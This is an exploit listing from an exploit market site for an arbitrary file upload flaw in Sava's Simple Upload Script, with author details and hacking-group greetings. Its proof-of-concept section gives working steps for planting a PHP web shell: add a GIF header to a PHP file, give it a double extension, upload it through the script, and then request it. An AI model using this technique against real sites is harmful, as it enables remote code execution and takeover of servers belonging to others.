[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sava’s Simple Upload Script / Arbitrary File Upload

Author
Daniel Godoy
Risk
[
Security Risk High
]
0day-ID
0day-ID-18911
Category
web applications
Date add
03-07-2012
Platform
php
# Exploit Title: Sava’s Simple Upload Script / Arbitrary File Upload
# Date: 03/07/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Sofware web: http://savasplace.com/wp-content/plugins/downloads-manager/upload/upload.tgz
# Tested on: Linux
#
# www.chap.cl
# Este Advisory fue descubierto por Daniel Godoy, integrante de Project CHAP Security
# be secured / stay secure
# contacto@chap.cl


[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
 
[PoC]
add GIF89a; and rename your php file whit name: shell.php.gif
http://localhost/upload.php
http://locahost/files/shell.php.gif



#  0day.today [2024-07-08]  #